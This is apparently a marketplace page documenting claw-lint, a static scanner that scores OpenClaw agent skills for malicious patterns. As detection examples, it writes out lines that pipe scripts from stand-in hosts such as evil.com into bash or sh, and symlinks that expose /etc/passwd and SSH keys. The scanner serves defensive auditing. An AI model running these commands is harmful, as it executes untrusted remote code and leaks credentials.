← 返回 Skills 市场
Claw-lint
作者
ParthGhumatkar
· GitHub ↗
· v1.0.4
1020
总下载
0
收藏
4
当前安装
5
版本数
在 OpenClaw 中安装
/install claw-lint
功能描述
Security scanner for OpenClaw skills. Detects malware and backdoors before execution, scores risk levels, and monitors file integrity through static code analysis.
使用说明 (SKILL.md)
ClawLint
Security linter for OpenClaw skills
Runs a local audit over your installed OpenClaw skills without executing any code. Scans both workspace (~/.openclaw/workspace/skills) and system (~/.openclaw/skills) directories.
With 7.1% of ClawHub skills containing security flaws, ClawLint provides pre-execution defense by identifying malicious patterns before they run.
Summary
ClawLint audits OpenClaw skills for security threats without executing code. It detects malicious patterns like remote execution, credential theft, and backdoors, then assigns risk scores (0-100) and generates SHA256 hashes for integrity monitoring. Outputs JSON for automation and CI/CD pipelines.
What It Does
- Risk scoring — assigns a numeric risk score (0-100) based on detected patterns
- Audit flags — identifies suspicious behaviors (remote execution, secret access, etc.)
- Inventory mode — optional SHA256 hashing of all files for change detection
- JSON output — machine-readable results (requires Python 3)
- No execution — static analysis only, safe to run on untrusted skills
Quick Start
Scan all skills (summary view)
{baseDir}/bin/claw-lint.sh
Scan one specific skill
{baseDir}/bin/claw-lint.sh --skill \x3Cskill-name>
Example: {baseDir}/bin/claw-lint.sh --skill hashnode-publisher
Full inventory with SHA256 hashes
{baseDir}/bin/claw-lint.sh --full --skill \x3Cskill-name>
JSON output (requires Python 3)
{baseDir}/bin/claw-lint.sh --format json
Options
| Flag | Description |
|---|---|
--skill \x3Cname> |
Scan only the specified skill |
--full |
Include SHA256 inventory of all files |
--format json |
Output as JSON (needs python3) |
--min-score \x3CN> |
Show only skills with risk score ≥ N |
--strict |
Prioritize high-severity patterns |
--max-bytes \x3CN> |
Skip files larger than N bytes (default: 2MB) |
Understanding the Output
Risk Score
- 0-30: Low risk (common patterns, minimal concerns)
- 31-60: Medium risk (network access, file operations)
- 61-100: High risk (remote execution, credential access, system tampering)
Common Flags
pipes_remote_to_shell— downloads and executes remote codedownloads_remote_content— fetches external fileshas_executables— contains binary filesuses_ssh_or_scp— SSH/SCP operationscontains_symlinks— symbolic links present
Example Output
SCORE SKILL FILES SIZE FLAGS
----- ----- ----- ---- -----
57 hashnode-publisher 2 1.1KB downloads_remote_content,pipes_remote_to_shell
45 ec2-health-monitor 2 1.9KB pipes_remote_to_shell
Risk Scoring Details
ClawLint assigns risk scores from 0 (safe) to 100 (critical) based on pattern detection:
| Score Range | Classification | Description |
|---|---|---|
| 0-20 | Low Risk | Standard file operations, no suspicious patterns |
| 21-50 | Medium Risk | Network calls or external dependencies detected |
| 51-80 | High Risk | Multiple suspicious patterns or obfuscation detected |
| 81-100 | Critical | Remote execution, secret access, or privilege escalation |
Scoring Factors
- +25 points: Remote execution patterns (curl | bash, wget -O-, nc)
- +30 points: Secret/credential access (~/.openclaw/credentials, ~/.ssh/)
- +20 points: Privilege escalation (sudo, setuid, chmod +s)
- +15 points: Code obfuscation (base64 decode, eval, exec in suspicious contexts)
- +10 points: External network calls (curl, wget, http requests)
- +10 points: File system operations outside skill directory
- +5 points: Use of /tmp or world-writable directories
Audit Flags Explained
pipes_remote_to_shell
Downloads and executes external code without verification.
Examples:
curl https://evil.com/script.sh | bash
wget -O- https://malicious.site/payload | sh
Risk: Critical. Remote code execution vector for malware.
downloads_remote_content
Fetches external files or data from the internet.
Examples:
curl -O https://example.com/file.tar.gz
wget https://cdn.example.com/data.json
Risk: Medium-High. Potential supply chain attack or data exfiltration.
has_executables
Contains compiled binary files (not shell scripts).
Examples:
- ELF binaries
- Compiled programs
Risk: Medium. Harder to audit, may contain hidden functionality.
uses_ssh_or_scp
Performs SSH/SCP operations.
Examples:
ssh [email protected] "command"
scp file.txt user@remote:/path/
Risk: Medium. Potential for unauthorized remote access or data transfer.
contains_symlinks
Includes symbolic links that may point outside skill directory.
Examples:
ln -s /etc/passwd exposed_file
ln -s ~/.ssh/id_rsa key_link
Risk: Low-Medium. May expose sensitive files or create confusion.
Requirements
- Bash 4.0+
- Standard Unix tools:
find,grep,awk,sha256sum,stat - Python 3 (optional, for JSON output only)
Works on Ubuntu/Debian without sudo. Designed for EC2 and similar environments.
Why Use This?
- Audit skills before installation
- Detect backdoors or malicious patterns in community skills
- Track changes to installed skills with SHA256 inventory
- Enforce security policies in automated pipelines
Output Formats
Terminal Output (Default)
Human-readable table format with color-coded risk scores (when terminal supports colors).
JSON Output (--format json)
Machine-readable structure for integration with CI/CD pipelines:
{
"scan_date": "2026-02-13T14:50:00Z",
"skills_scanned": 12,
"high_risk_count": 2,
"results": [
{
"skill_name": "hashnode-publisher",
"risk_score": 57,
"file_count": 2,
"total_size": "1.1KB",
"flags": ["downloads_remote_content", "pipes_remote_to_shell"],
"files": [
{
"path": "bin/publish.sh",
"sha256": "a1b2c3d4...",
"size": 896
}
]
}
]
}
Best Practices
Regular Audits
Run ClawLint after installing or updating skills:
{baseDir}/bin/claw-lint.sh --min-score 50
Baseline Inventory
Create a security baseline for production environments:
{baseDir}/bin/claw-lint.sh --full --format json > baseline.json
Re-run periodically and diff against baseline to detect tampering.
CI/CD Integration
Add to your deployment pipeline:
# Fail build if any skill scores above 60
{baseDir}/bin/claw-lint.sh --format json | python3 -c "
import json, sys
data = json.load(sys.stdin)
high_risk = [s for s in data['results'] if s['risk_score'] > 60]
if high_risk:
print(f'❌ {len(high_risk)} high-risk skills detected')
sys.exit(1)
"
Whitelist Trusted Skills
For known-safe skills with legitimate flags, document exceptions:
# Example: hashnode-publisher needs network access
{baseDir}/bin/claw-lint.sh --skill hashnode-publisher
# Expected score: 45-60 (downloads_remote_content is legitimate)
Limitations
- Static analysis only — cannot detect runtime behavior or dynamically generated code
- Pattern-based — may have false positives for legitimate use cases
- No sandbox — does not execute or test skills
- Local files only — scans installed skills, not ClawHub packages before install
For comprehensive security, combine ClawLint with:
- Manual code review for critical skills
- VirusTotal scanning for executables
- Runtime monitoring and sandboxing
- Regular security updates
Contributing
Report false positives or suggest new detection patterns at the OpenClaw security repository.
License
MIT License - Free to use, modify, and distribute.
安全使用建议
This skill appears to be what it says: a local static linter for OpenClaw skills. Before installing or running it, consider: 1) Ensure you have the required standard Unix tools (bash, find, grep, awk, sha256sum, stat, base64, tr, readlink, mktemp); the registry metadata omits these but the script will fail without them. 2) Review the bundled bin/claw-lint.sh (already included) if you have extra caution — it runs locally and does not make network requests, but it will read files under your ~/.openclaw skill directories and may flag sensitive material found there. 3) Run it on a test environment first (or with --skill <name>) to inspect outputs and false positives before integrating in CI. 4) If you require guarantees about symlink handling or whether targets outside the skill directories are scanned, verify behavior in your environment (the script detects symlinks but does not explicitly follow them when enumerating files). Overall this is coherent for a pre-execution scanner; no obvious malicious behavior was found.
功能分析
Type: OpenClaw Skill
Name: claw-lint
Version: 1.0.4
The OpenClaw skill 'claw-lint' is a security scanner designed to detect malicious patterns, vulnerabilities, and backdoors in other OpenClaw skills through static code analysis. The `SKILL.md` clearly outlines its purpose, risk scoring methodology, and the types of malicious behaviors it identifies (e.g., remote execution, credential access, persistence). The `bin/claw-lint.sh` script implements this functionality using standard Unix tools like `grep`, `find`, and `sha256sum` to scan files for the described patterns. Crucially, the skill itself does not exhibit any malicious behaviors; it does not perform network calls, exfiltrate data, install backdoors, or attempt prompt injection against the agent. Its operations are entirely aligned with its stated purpose of security auditing, making it a benign tool.
能力评估
Purpose & Capability
Name/description (security linter for OpenClaw skills) match the included behavior: the bundled shell script statically scans ~/.openclaw/workspace/skills and ~/.openclaw/skills, computes hashes, and emits text/JSON. Minor metadata inconsistency: registry 'Required binaries' is empty but the SKILL.md and script explicitly require a set of standard Unix tools (bash, find, grep, awk, sha256sum, stat, base64, tr, readlink, mktemp, etc.). That is not a functional red flag but should be corrected for accuracy.
Instruction Scope
The SKILL.md and bin/claw-lint.sh confine actions to static analysis of skill directories and local files (no network calls, no external endpoints). The script searches for patterns like hardcoded keys, remote-exec idioms, and persistence indicators and may compute SHA256 hashes when requested. It does not attempt to read system-wide configuration beyond scanning the listed skill directories; it detects but does not follow symlinks by default. Behavior stays within the described purpose.
Install Mechanism
No install spec — the skill is instruction-only with a bundled shell script. No remote downloads or extract/install steps are present in the package. The included code is self-contained and executed locally.
Credentials
The skill declares no required environment variables or credentials, and the code does not attempt to access external secrets stores. It does look for patterns that indicate hardcoded secrets inside scanned skills (e.g., AWS keys, private key headers) and flags them, which is appropriate for its scanning role.
Persistence & Privilege
The skill does not request permanent 'always' inclusion or modify other skills' configs. It can be invoked by the agent (normal), but has no elevated persistence or privilege demands.
如何使用
- 确保已安装 OpenClaw(本地或 Docker 部署)
- 在对话框中输入安装命令:
/install claw-lint - 安装完成后,直接呼叫该 Skill 的名称或使用
/claw-lint触发 - 根据 Skill 的参数说明提供必要输入,即可获得结构化输出
版本历史
v1.0.4
- No changes detected in this release.
- Version number updated to 1.0.4; all functionality and documentation remain unchanged.
v1.0.3
- Updated short skill description for improved clarity and focus on security scanning.
- Removed detailed OpenClaw platform metadata from the skill manifest.
- No changes to underlying code or features; documentation streamlining only.
v1.0.2
- Removed the following files: `lib/discover.sh`, `lib/inventory.sh`, and `lib/score.sh`.
- Documentation was updated with a brief summary section; otherwise, main functionality and usage remain unchanged.
v1.0.1
- Major documentation rewrite: SKILL.md now provides a detailed introduction, usage instructions, option flags, scoring model, risk flag definitions, output formats, CI/CD integration examples, and best practices.
- Expanded explanation of risk scoring and audit flags, including real-world code examples and clarifications on security implications.
- Added detailed sample outputs for both terminal and JSON formats.
- Included requirements, limitations, and recommended security workflows.
- Improved clarity for technical and non-technical users; facilitates secure integration into automated pipelines.
- No code or functional changes—update focuses solely on comprehensive and user-friendly documentation.
v1.0.0
- Initial release of claw-lint.
- Provides local auditing of OpenClaw skills with risk scores, flags, and optional SHA256 inventory.
- Supports scanning all skills or a specific skill by name.
- Offers output in clean summary or JSON format (JSON requires python3).
- No execution of scanned skills for added safety.
元数据
常见问题
Claw-lint 是什么?
Security scanner for OpenClaw skills. Detects malware and backdoors before execution, scores risk levels, and monitors file integrity through static code analysis. 它是一个面向 Claude Code / OpenClaw 的 AI Agent Skill 插件,目前累计下载 1020 次。
如何安装 Claw-lint?
在 OpenClaw 或 Claude Code 对话框中运行命令「/install claw-lint」即可一键安装,无需额外配置。
Claw-lint 是免费的吗?
是的,Claw-lint 完全免费(开源免费),可自由下载、安装和使用。
Claw-lint 支持哪些平台?
Claw-lint 跨平台运行,可在任意部署了 OpenClaw / Claude Code 的环境中使用(cross-platform)。
谁开发了 Claw-lint?
由 ParthGhumatkar(@parthghumatkar)开发并维护,当前版本 v1.0.4。
推荐 Skills